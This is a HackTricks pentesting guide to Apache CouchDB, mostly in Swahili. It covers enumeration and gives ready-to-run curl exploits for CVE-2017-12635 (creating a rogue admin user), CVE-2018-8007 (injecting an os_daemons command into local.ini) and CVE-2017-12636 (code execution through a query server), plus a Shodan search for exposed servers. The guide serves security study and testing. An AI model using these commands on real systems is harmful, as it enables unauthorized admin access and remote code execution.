# 5984,6984 - Pentesting CouchDB
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **Basic Information**
**CouchDB** ni **hifadhidata** yenye uwezo na inayoweza kubadilika ambayo inaratibu data kwa kutumia muundo wa **ramani ya funguo-thamani** ndani ya kila **document**. Sehemu ndani ya hati zinaweza kuwakilishwa kama **funguo/maadili, orodha, au ramani**, ikitoa kubadilika katika uhifadhi na upatikanaji wa data.
Kila **document** iliyohifadhiwa katika CouchDB inapewa **kitambulisho cha kipekee** (`_id`) katika kiwango cha hati. Zaidi ya hayo, kila mabadiliko yaliyofanywa na kuhifadhiwa kwenye hifadhidata yanapewa **nambari ya marekebisho** (`_rev`). Nambari hii ya marekebisho inaruhusu **kufuatilia na kusimamia mabadiliko** kwa ufanisi, ikirahisisha upatikanaji na usawazishaji wa data ndani ya hifadhidata.
**Port ya kawaida:** 5984(http), 6984(https)
```
PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
## **Uhesabuaji wa Otomatiki**
```bash
nmap -sV --script couchdb-databases,couchdb-stats -p
msf> use auxiliary/scanner/couchdb/couchdb_enum
```
## Manual Enumeration
### Banner
```
curl http://IP:5984/
```
Hii inatoa ombi la GET kwa mfano wa CouchDB uliofungwa. Jibu linapaswa kuonekana kama mojawapo ya yafuatayo:
```bash
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```
{% hint style="info" %}
Kumbuka kwamba ikiwa unapata `401 Unauthorized` unapofikia mzizi wa couchdb na kitu kama hiki: `{"error":"unauthorized","reason":"Authentication required."}` **hutaweza kufikia** bendera au kiunganishi kingine chochote.
{% endhint %}
### Info Enumeration
Hizi ni kiunganishi ambacho unaweza kufikia kwa ombi la **GET** na kutoa taarifa za kuvutia. Unaweza kupata [**kiunganishi zaidi na maelezo ya kina katika nyaraka za couchdb**](https://docs.couchdb.org/en/latest/api/index.html).
* **`/_active_tasks`** Orodha ya kazi zinazofanyika, ikiwa ni pamoja na aina ya kazi, jina, hali na kitambulisho cha mchakato.
* **`/_all_dbs`** Inarudisha orodha ya hifadhidata zote katika mfano wa CouchDB.
* **`/_cluster_setup`** Inarudisha hali ya node au klasta, kulingana na msaidizi wa usanidi wa klasta.
* **`/_db_updates`** Inarudisha orodha ya matukio yote ya hifadhidata katika mfano wa CouchDB. Uwepo wa hifadhidata ya `_global_changes` unahitajika kutumia kiunganishi hiki.
* **`/_membership`** Inaonyesha nodes ambazo ni sehemu ya klasta kama `cluster_nodes`. Sehemu `all_nodes` inaonyesha nodes zote ambazo node hii inazijua, ikiwa ni pamoja na zile ambazo ni sehemu ya klasta.
* **`/_scheduler/jobs`** Orodha ya kazi za nakala. Maelezo ya kila kazi yatakuwa na taarifa za chanzo na lengo, kitambulisho cha nakala, historia ya tukio la hivi karibuni, na mambo mengine machache.
* **`/_scheduler/docs`** Orodha ya hali za hati za nakala. Inajumuisha taarifa kuhusu hati zote, hata katika hali za `completed` na `failed`. Kwa kila hati inarudisha kitambulisho cha hati, hifadhidata, kitambulisho cha nakala, chanzo na lengo, na taarifa nyingine.
* **`/_scheduler/docs/{replicator_db}`**
* **`/_scheduler/docs/{replicator_db}/{docid}`**
* **`/_node/{node-name}`** Kiunganishi `/_node/{node-name}` kinaweza kutumika kuthibitisha jina la node ya Erlang ya seva inayoshughulikia ombi. Hii ni muhimu zaidi unapofikia `/_node/_local` ili kupata taarifa hii.
* **`/_node/{node-name}/_stats`** Rasilimali `_stats` inarudisha kitu cha JSON kinachojumuisha takwimu za seva inayofanya kazi. Mstari halisi `_local` hutumikia kama jina la badala kwa jina la node ya ndani, hivyo kwa URL zote za takwimu, `{node-name}` inaweza kubadilishwa na `_local`, ili kuingiliana na takwimu za node ya ndani.
* **`/_node/{node-name}/_system`** Rasilimali \_system inarudisha kitu cha JSON kinachojumuisha takwimu mbalimbali za kiwango cha mfumo kwa seva inayofanya kazi\_.\_ Unaweza kutumia \_\_`_local` kama {node-name} kupata taarifa za sasa za node.
* **`/_node/{node-name}/_restart`**
* **`/_up`** Inathibitisha kwamba seva iko juu, inafanya kazi, na iko tayari kujibu maombi. Ikiwa [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) ni `true` au `nolb`, kiunganishi kitarejesha jibu la 404.
* **`/_uuids`** Inahitaji kitambulisho kimoja au zaidi cha Kipekee Duniani (UUIDs) kutoka kwa mfano wa CouchDB.
* **`/_reshard`** Inarudisha hesabu ya kazi zilizokamilika, zilizoshindwa, zinazofanyika, zilizositishwa, na jumla pamoja na hali ya upya wa klasta.
Taarifa zaidi za kuvutia zinaweza kutolewa kama ilivyoelezwa hapa: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB)
### **Orodha ya Hifadhidata**
```
curl -X GET http://IP:5984/_all_dbs
```
Ikiwa ombi hilo **linajibu na 401 isiyoidhinishwa**, basi unahitaji **vithibitisho halali** ili kufikia hifadhidata:
```
curl -X GET http://user:password@IP:5984/_all_dbs
```
Ili kupata Credentials halali unaweza **jaribu** [**kuvunjia huduma**](../generic-methodologies-and-resources/brute-force.md#couchdb).
Hii ni **mfano** wa **jibu** la couchdb unapokuwa na **mamlaka ya kutosha** ya kuorodhesha hifadhidata (Ni orodha tu ya dbs):
```bash
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```
### Database Info
Unaweza kupata baadhi ya taarifa za database (kama vile idadi ya faili na ukubwa) kwa kufikia jina la database:
```bash
curl http://IP:5984/
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
```
### **Orodha ya Hati**
Orodha kila kipengee ndani ya hifadhidata
```bash
curl -X GET http://IP:5984/{dbname}/_all_docs
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
```
### **Soma Hati**
Soma maudhui ya hati ndani ya hifadhidata:
```bash
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
```
## CouchDB Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
Shukrani kwa tofauti kati ya parsers za Erlang na JavaScript JSON unaweza **kuunda mtumiaji wa admin** mwenye akauti `hacktricks:hacktricks` kwa ombi lifuatalo:
```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
```
[**Taarifa zaidi kuhusu hii vuln hapa**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
## CouchDB RCE
### **Muhtasari wa Usalama wa Keki ya Erlang**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Katika nyaraka za CouchDB, hasa katika sehemu inayohusiana na usanidi wa klasta ([kiungo](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), matumizi ya bandari na CouchDB katika hali ya klasta yanajadiliwa. Inatajwa kwamba, kama katika hali ya pekee, bandari `5984` inatumika. Aidha, bandari `5986` ni kwa APIs za ndani za node, na muhimu zaidi, Erlang inahitaji bandari ya TCP `4369` kwa ajili ya Erlang Port Mapper Daemon (EPMD), inayowezesha mawasiliano ya node ndani ya klasta ya Erlang. Usanidi huu unaunda mtandao ambapo kila node inahusishwa na kila node nyingine.
Taarifa muhimu ya usalama inasisitizwa kuhusu bandari `4369`. Ikiwa bandari hii itapatikana kupitia Mtandao au mtandao wowote usioaminika, usalama wa mfumo unategemea sana kitambulisho cha kipekee kinachojulikana kama "keki." Keki hii inafanya kazi kama kinga. Kwa mfano, katika orodha fulani ya michakato, keki iliyopewa jina "monster" inaweza kuonekana, ikionyesha jukumu lake katika mfumo wa usalama wa mfumo.
```
www-data@canape:/$ ps aux | grep couchdb
root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb
root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb
homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b
```
Kwa wale wanaovutiwa na kuelewa jinsi "keki" hii inaweza kutumika kwa ajili ya Remote Code Execution (RCE) ndani ya muktadha wa mifumo ya Erlang, sehemu maalum inapatikana kwa ajili ya kusoma zaidi. Inabainisha mbinu za kutumia keki za Erlang kwa njia zisizoidhinishwa ili kupata udhibiti wa mifumo. Unaweza **[kuchunguza mwongozo wa kina juu ya kutumia keki za Erlang kwa RCE hapa](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.
### **Kutatua CVE-2018-8007 kupitia Marekebisho ya local.ini**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Uthibitisho wa hivi karibuni wa udhaifu, CVE-2018-8007, unaoathiri Apache CouchDB ulifanyiwa uchambuzi, ukionyesha kwamba matumizi yanahitaji ruhusa za kuandika kwenye faili `local.ini`. Ingawa si moja kwa moja inatumika kwa mfumo wa lengo wa awali kutokana na vizuizi vya usalama, marekebisho yalifanywa ili kutoa ufikiaji wa kuandika kwenye faili `local.ini` kwa ajili ya madhumuni ya uchunguzi. Hatua za kina na mifano ya msimbo zinatolewa hapa chini, zikionyesha mchakato.
Kwanza, mazingira yanaandaliwa kwa kuhakikisha faili `local.ini` inaweza kuandikwa, ikithibitishwa kwa kuorodhesha ruhusa:
```bash
root@canape:/home/homer/etc# ls -l
-r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini
-rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini
-r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk
-r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args
```
Ili kutumia udhaifu huo, amri ya curl inatekelezwa, ikilenga usanidi wa `cors/origins` katika `local.ini`. Hii inaingiza asili mpya pamoja na amri za ziada chini ya sehemu ya `[os_daemons]`, ikilenga kutekeleza msimbo wa kiholela:
```bash
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf"
```
Uthibitisho wa baadaye unaonyesha usanidi ulioingizwa katika `local.ini`, ukilinganisha na nakala ya akiba ili kuonyesha mabadiliko:
```bash
root@canape:/home/homer/etc# diff local.ini local.ini.bk
119,124d118
< [cors]
< origins = 0xdf
< [os_daemons]
< test_daemon = /usr/bin/touch /tmp/0xdf
```
Awali, faili inatarajiwa (`/tmp/0xdf`) halipo, ikionyesha kwamba amri iliyowekwa haijatekelezwa bado. Uchunguzi zaidi unaonyesha kwamba michakato inayohusiana na CouchDB inafanya kazi, ikiwa ni pamoja na moja ambayo inaweza kutekeleza amri iliyowekwa:
```bash
root@canape:/home/homer/bin# ps aux | grep couch
```
Kwa kumaliza mchakato wa CouchDB ulioainishwa na kuruhusu mfumo kuanzisha upya kiotomatiki, utekelezaji wa amri iliyowekwa unachochewa, kuthibitishwa na uwepo wa faili iliyokosekana hapo awali:
```bash
root@canape:/home/homer/etc# kill 711
root@canape:/home/homer/etc# ls /tmp/0xdf
/tmp/0xdf
```
Hii uchunguzi inathibitisha uwezekano wa unyakuzi wa CVE-2018-8007 chini ya hali maalum, hasa hitaji la ufikiaji wa kuandika kwenye faili `local.ini`. Mifano ya msimbo iliyotolewa na hatua za utaratibu zinatoa mwongozo wazi wa kuiga unyakuzi katika mazingira yaliyodhibitiwa.
Kwa maelezo zaidi kuhusu CVE-2018-8007, rejelea taarifa kutoka mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/).
### **Kuchunguza CVE-2017-12636 na Ruhusa za Kuandika kwenye local.ini**
Mfano [kutoka hapa](https://0xdf.gitlab.io/2018/09/15/htb-canape.html).
Uthibitisho wa udhaifu unaojulikana kama CVE-2017-12636 ulifanyiwa uchunguzi, ambao unaruhusu utekelezaji wa msimbo kupitia mchakato wa CouchDB, ingawa usanidi maalum unaweza kuzuia unyakuzi wake. Licha ya marejeleo mengi ya Ushahidi wa Dhana (POC) yanayopatikana mtandaoni, marekebisho yanahitajika ili kuweza kutumia udhaifu kwenye toleo la CouchDB 2, tofauti na toleo linalolengwa mara nyingi 1.x. Hatua za awali zinajumuisha kuthibitisha toleo la CouchDB na kuthibitisha kutokuwepo kwa njia ya seva za uchunguzi zinazotarajiwa:
```bash
curl http://localhost:5984
curl http://0xdf:df@localhost:5984/_config/query_servers/
```
Ili kuendana na toleo la CouchDB 2.0, njia mpya inatumika:
```bash
curl 'http://0xdf:df@localhost:5984/_membership'
curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers
```
Majaribio ya kuongeza na kuitisha seva mpya ya uchunguzi yalikutana na makosa yanayohusiana na ruhusa, kama inavyoonyeshwa na matokeo yafuatayo:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Uchunguzi zaidi ulibaini matatizo ya ruhusa na faili ya `local.ini`, ambayo haikuweza kuandikwa. Kwa kubadilisha ruhusa za faili kwa kutumia root au ufikiaji wa homer, ilikua inawezekana kuendelea:
```bash
cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini
```
Majaribio ya baadaye ya kuongeza seva ya uchunguzi yalifanikiwa, kama inavyoonyeshwa na ukosefu wa ujumbe wa makosa katika jibu. Marekebisho ya mafanikio ya faili ya `local.ini` yalithibitishwa kupitia kulinganisha faili:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
```
Mchakato uliendelea na uundaji wa hifadhidata na hati, ukifuatwa na jaribio la kutekeleza msimbo kupitia ramani ya mtazamo maalum kwa seva ya uchunguzi iliyoongezwa hivi karibuni:
```bash
curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'
```
A **[muhtasari](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** wenye payload mbadala unatoa ufahamu zaidi kuhusu kutumia CVE-2017-12636 chini ya hali maalum. **Rasilimali muhimu** za kutumia udhaifu huu ni pamoja na:
- [Msimbo wa POC exploit](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py)
- [Kichwa cha Taarifa ya Exploit Database](https://www.exploit-db.com/exploits/44913/)
## Shodan
* `port:5984 couchdb`
## Marejeleo
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}